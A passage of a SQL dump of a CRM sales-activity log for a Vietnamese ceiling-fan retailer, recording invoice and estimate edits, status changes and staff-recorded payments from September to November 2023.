(2581, 'invoice', 323, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-09-23 10:53:43'),
(2582, 'invoice', 323, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:36:\"Quạt trần KATRINA Gray Dark Wood\";i:1;s:32:\"Quạt trần KATRINA Maple Wood\";}', '17', 'Loan Nguyễn', '2023-09-23 10:53:43'),
(2583, 'invoice', 323, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:32:\"Quạt trần KATRINA Maple Wood\";}', '17', 'Loan Nguyễn', '2023-09-23 10:57:10'),
(2584, 'invoice', 323, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:40:\"Quạt trần KATRINA 52 Gray Maple Wood\";}', '17', 'Loan Nguyễn', '2023-09-23 10:57:10'),
(2585, 'invoice', 336, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-09-25 01:00:02'),
(2586, 'invoice', 337, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-09-25 01:00:02'),
(2587, 'invoice', 323, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:551:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China    <br />\r\n\";i:1;s:497:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '17', 'Loan Nguyễn', '2023-09-25 08:42:20'),
(2588, 'invoice', 323, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-25 08:42:24'),
(2589, 'invoice', 323, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.975.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/345\" target=\"_blank\">#345</a>\";}', '17', 'Loan Nguyễn', '2023-09-25 08:42:24'),
(2590, 'invoice', 344, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-09-26 10:50:33'),
(2591, 'invoice', 344, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:319:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: không đèn  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:288:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: không đèn  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-09-26 10:51:55'),
(2592, 'invoice', 345, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-09-28 10:48:24'),
(2593, 'invoice', 345, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-28 10:48:32'),
(2594, 'invoice', 345, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-09-28 10:48:32'),
(2595, 'invoice', 345, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-28 14:42:08'),
(2596, 'invoice', 345, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"27.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/346\" target=\"_blank\">#346</a>\";}', '17', 'Loan Nguyễn', '2023-09-28 14:42:08'),
(2597, 'invoice', 337, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:50:\"Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT\";i:1;s:4:\"4.00\";i:2;s:1:\"1\";}', '17', 'Loan Nguyễn', '2023-09-28 14:44:33'),
(2598, 'invoice', 337, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-09-28 14:44:38'),
(2599, 'invoice', 337, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/347\" target=\"_blank\">#347</a>\";}', '17', 'Loan Nguyễn', '2023-09-28 14:44:38'),
(2600, 'invoice', 344, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:318:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: không đèn  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm\";i:1;s:261:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Matte White   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: không đèn  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-10-05 11:03:54'),
(2601, 'invoice', 346, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-10-05 14:17:07'),
(2602, 'invoice', 346, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood\";i:1;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood\";}', '17', 'Loan Nguyễn', '2023-10-05 14:24:02'),
(2603, 'invoice', 346, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:343:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt Black (Đen sơn tĩnh điện)  \r\nMàu cánh: Gỗ tối (DarkWood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-10-05 14:24:02'),
(2604, 'invoice', 346, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6800000.00\";i:1;s:10:\"6050000.00\";}', '17', 'Loan Nguyễn', '2023-10-05 14:24:02'),
(2605, 'invoice', 346, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '17', 'Loan Nguyễn', '2023-10-05 14:24:02'),
(2606, 'invoice', 346, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"25\";i:1;s:1:\"0\";}', '17', 'Loan Nguyễn', '2023-10-05 14:24:02'),
(2607, 'invoice', 346, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-10-05 14:24:02'),
(2608, 'invoice', 346, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-05 14:25:05'),
(2609, 'invoice', 346, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-10-05 14:25:05'),
(2610, 'invoice', 346, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2023-10-05 14:56:14'),
(2611, 'invoice', 346, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-06 13:48:12'),
(2612, 'invoice', 346, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.534.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/348\" target=\"_blank\">#348</a>\";}', '17', 'Loan Nguyễn', '2023-10-06 13:48:12'),
(2613, 'estimate', 228, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-10-07 14:54:36'),
(2614, 'estimate', 228, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-10-07 14:54:41'),
(2615, 'estimate', 228, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:22:\"chi phí ống ty 1m6 \";i:1;s:21:\"chi phí ống ty 1m6\";}', '17', 'Loan Nguyễn', '2023-10-07 14:55:40'),
(2616, 'estimate', 228, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:388:\"Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)\";i:1;s:355:\"Sải cánh 152cm ( ~ 60inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   \r\nMàu thân quạt: Matt Black (Đen mờ sơn tĩnh điện)   \r\nMàu cánh: Gỗ sáng (Maple Wood)   \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-10-07 14:58:09'),
(2617, 'invoice', 347, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-10-07 16:01:34'),
(2618, 'estimate', 228, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/347\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-10-07 16:01:34'),
(2619, 'invoice', 347, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-07 16:01:51'),
(2620, 'invoice', 347, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/349\" target=\"_blank\">#349</a>\";}', '17', 'Loan Nguyễn', '2023-10-07 16:01:51'),
(2621, 'invoice', 347, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"30\";}', '17', 'Loan Nguyễn', '2023-10-07 16:02:56'),
(2622, 'estimate', 5, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-10-07 17:02:23'),
(2623, 'invoice', 344, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-09 08:58:31'),
(2624, 'invoice', 344, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.184.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/350\" target=\"_blank\">#350</a>\";}', '17', 'Loan Nguyễn', '2023-10-09 08:58:31'),
(2625, 'estimate', 229, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-10-11 11:14:49'),
(2626, 'estimate', 229, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-10-11 11:14:55'),
(2627, 'estimate', 230, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-10-13 12:09:36'),
(2628, 'estimate', 230, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-10-13 12:09:40'),
(2629, 'invoice', 347, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-13 15:07:10'),
(2630, 'invoice', 347, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/351\" target=\"_blank\">#351</a>\";}', '17', 'Loan Nguyễn', '2023-10-13 15:07:10'),
(2631, 'invoice', 346, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-16 11:50:54'),
(2632, 'invoice', 346, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.534.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/352\" target=\"_blank\">#352</a>\";}', '17', 'Loan Nguyễn', '2023-10-16 11:50:54'),
(2633, 'estimate', 229, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-10-19 01:00:02'),
(2634, 'estimate', 230, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-10-21 01:00:01'),
(2635, 'estimate', 231, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-10-23 15:22:28'),
(2636, 'invoice', 348, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-10-23 15:24:03'),
(2637, 'estimate', 231, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/348\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-10-23 15:24:03'),
(2638, 'invoice', 348, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-23 15:26:06'),
(2639, 'invoice', 348, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-10-23 15:26:06'),
(2640, 'invoice', 348, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-23 15:43:08'),
(2641, 'invoice', 348, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/353\" target=\"_blank\">#353</a>\";}', '17', 'Loan Nguyễn', '2023-10-23 15:43:08'),
(2642, 'estimate', 232, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-10-24 10:18:59'),
(2643, 'estimate', 232, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-10-24 10:19:04'),
(2644, 'estimate', 232, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2023-10-24 10:21:14'),
(2645, 'estimate', 233, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-10-24 10:50:17'),
(2646, 'estimate', 233, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '1', 'Ho Gia Phat', '2023-10-24 10:50:54'),
(2647, 'estimate', 233, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:27:\"Ống ty treo quạt trần\";}', '1', 'Ho Gia Phat', '2023-10-24 10:50:54'),
(2648, 'estimate', 233, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:27:\"Ống ty treo quạt trần\";i:1;s:4:\"2.00\";i:2;s:1:\"3\";}', '1', 'Ho Gia Phat', '2023-10-24 10:51:36'),
(2649, 'estimate', 233, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '1', 'Ho Gia Phat', '2023-10-24 10:52:29'),
(2650, 'estimate', 233, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:6:\"550000\";}', '1', 'Ho Gia Phat', '2023-10-24 10:52:44'),
(2651, 'invoice', 275, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-10-24 11:06:14'),
(2652, 'invoice', 275, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:71:\"Nhân công lắp đặt quạt trần - Trần bê tông trực tiếp\";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-10-24 11:06:14'),
(2653, 'estimate', 234, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-10-24 12:13:52');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(2654, 'estimate', 234, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '1', 'Ho Gia Phat', '2023-10-24 12:14:26'),
(2655, 'invoice', 349, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-10-24 12:17:04'),
(2656, 'estimate', 234, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/349\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2023-10-24 12:17:04'),
(2657, 'invoice', 348, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-25 10:03:47'),
(2658, 'invoice', 348, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/354\" target=\"_blank\">#354</a>\";}', '17', 'Loan Nguyễn', '2023-10-25 10:03:47'),
(2659, 'invoice', 275, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-25 11:30:57'),
(2660, 'invoice', 275, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/355\" target=\"_blank\">#355</a>\";}', '17', 'Loan Nguyễn', '2023-10-25 11:30:57'),
(2661, 'estimate', 235, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-10-30 11:47:11'),
(2662, 'estimate', 235, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:336:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:305:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-10-30 11:47:19'),
(2663, 'estimate', 235, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:335:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm\";i:1;s:293:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)     \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)     \r\nĐèn LED: không đèn  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-10-30 11:48:20'),
(2664, 'estimate', 235, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-10-30 11:49:20'),
(2665, 'estimate', 234, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2023-10-30 16:51:39'),
(2666, 'estimate', 230, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:44:\"Chi phí sơn 3 cánh quạt sang màu sẫm\";}', '17', 'Loan Nguyễn', '2023-10-31 14:05:55'),
(2667, 'invoice', 350, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-10-31 14:06:23'),
(2668, 'estimate', 230, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/350\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-10-31 14:06:23'),
(2669, 'invoice', 350, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-10-31 14:06:28'),
(2670, 'invoice', 350, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-10-31 14:06:28'),
(2671, 'invoice', 350, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"30\";}', '17', 'Loan Nguyễn', '2023-10-31 14:07:21'),
(2672, 'estimate', 232, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-11-01 01:00:03'),
(2673, 'invoice', 351, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-01 16:05:32'),
(2674, 'invoice', 351, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-01 16:05:39'),
(2675, 'invoice', 351, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-11-01 16:05:39'),
(2676, 'invoice', 351, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-01 16:07:31'),
(2677, 'invoice', 351, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"31.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/356\" target=\"_blank\">#356</a>\";}', '17', 'Loan Nguyễn', '2023-11-01 16:07:31'),
(2678, 'invoice', 350, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-01 17:09:16'),
(2679, 'invoice', 350, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.651.400 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/357\" target=\"_blank\">#357</a>\";}', '17', 'Loan Nguyễn', '2023-11-01 17:09:16'),
(2680, 'invoice', 352, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-06 16:46:33'),
(2681, 'invoice', 353, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-06 16:46:56'),
(2682, 'estimate', 235, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-11-07 01:00:03'),
(2683, 'invoice', 352, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-07 09:47:15'),
(2684, 'invoice', 352, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/358\" target=\"_blank\">#358</a>\";}', '17', 'Loan Nguyễn', '2023-11-07 09:47:15'),
